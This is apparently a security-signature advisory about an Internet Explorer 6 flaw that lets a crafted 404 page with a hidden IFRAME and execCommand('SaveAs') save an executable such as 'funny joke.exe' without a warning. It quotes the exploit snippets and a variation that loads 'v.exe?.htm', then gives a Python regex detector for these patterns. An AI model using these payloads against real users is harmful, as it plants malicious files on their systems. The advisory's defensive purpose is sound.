Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
Description
This signature detects attempts to exploit a file download warning vulnerability in Internet Explorer.
Additional Information
Microsoft Internet Explorer is reported prone to a file download security warning bypass vulnerability. This issue may be exploited to download a malicious file to the client system.
When a URI location is not found the user usually receives a 404 error message. It is reported that this issue allows an attacker to create a custom HTTP 404 error message and use the 'execCommand' method to save a Web page to the local system.
The 'execCommand' method is used to execute a command on the current document. It is called in the following form:
object.execCommand(sCommand [, bUserInterface] [, vValue])
By using this method to execute the 'SaveAs' command on a document, the attacker can save it on the local system in the following manner:
document.execCommand('SaveAs','1','Name of the webpage.htm');
Internet Explorer warns a user when an attempt is made to download a file. The warning notifies the user of the dangers of downloading certain types of files. It is reported that this issue bypasses this security warning and also bypasses the 'Open File' security warning that appears when a downloaded executable is launched, which originates from an untrusted zone such as the Internet.
To carry out this attack, the attacker first modifies the Error Mapping Properties of a Web server such as IIS. The attacker places an IFRAME in the error document in the following manner:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
This generates an error message, as the file specified in the IFRAME does not exist. The attacker also places malicious script code in the file in the following manner:
javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
It is reported that this code references malicious data in the frame 'NotFound' and pipes it to 'funny joke.exe'.
By enticing a user to follow a malicious link, the attacker can plant malicious files on vulnerable systems in order to execute malicious code.
Update: A variation of the original exploit is available. This variation does not require that the IIS Error Mapping Properties be modified. Instead, the IFRAME source address is set as 'http://example.com/v.exe?.htm'.
The JavaScript URI 'javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');' is also executed in this variation to reference the malicious 'v.exe?.htm' data in the frame 'NotFound' and pipe it to 'funny joke.exe'.
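A defender-side check for the pattern described above, as an added example that is not the signature's own logic or code from the original page: it flags response bodies that call execCommand('SaveAs') with an executable file name, and IFRAME sources shaped like the 'v.exe?.htm' variation. The function names, rule labels and extension lists are assumptions, and the sample bodies are constructed from the snippets quoted in this description.

```python
import re
from urllib.parse import urlsplit

# Assumption: extensions treated as executable; this list is not from the advisory.
EXECUTABLE_EXT = (".exe", ".scr", ".bat", ".pif", ".hta")
PAGE_EXT = (".htm", ".html")

# execCommand('SaveAs', <bUserInterface>, '<file name>'), any quoting or spacing.
SAVEAS_RE = re.compile(
    r"""execCommand\s*\(\s*['"]SaveAs['"]\s*,\s*[^,]*,\s*['"]([^'"]+)['"]""",
    re.IGNORECASE)
IFRAME_SRC_RE = re.compile(r"""<iframe\b[^>]*\bsrc\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)

def is_executable(name):
    return name.strip().lower().endswith(EXECUTABLE_EXT)

def inspect_body(body):
    """Return (rule, evidence) findings for one HTTP response body."""
    findings = []
    for m in SAVEAS_RE.finditer(body):
        # Saving a document under an executable name is the core of the issue.
        if is_executable(m.group(1)):
            findings.append(("saveas-executable", m.group(1)))
    for m in IFRAME_SRC_RE.finditer(body):
        url = urlsplit(m.group(1))
        # Variation: executable path with a query that ends like a web page.
        if is_executable(url.path) and url.query.lower().endswith(PAGE_EXT):
            findings.append(("iframe-executable-as-page", m.group(1)))
    return findings

# Constructed samples, assembled from the snippets quoted in this description.
SAMPLE_ORIGINAL = """<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
<a href="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">joke</a>"""
SAMPLE_VARIATION = SAMPLE_ORIGINAL.replace("vengy404.htm", "http://example.com/v.exe?.htm")
SAMPLE_BENIGN = "<script>document.execCommand('SaveAs','1','Name of the webpage.htm');</script>"

if __name__ == "__main__":
    for label, body in [("original", SAMPLE_ORIGINAL), ("variation", SAMPLE_VARIATION),
                        ("benign", SAMPLE_BENIGN)]:
        print(label, inspect_body(body))
```

The benign sample saves under a '.htm' name and produces no finding, which keeps ordinary 'SaveAs' use from being flagged.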
Affected
- Microsoft Internet Explorer 6.0, 6.0 SP1, 6.0 SP2





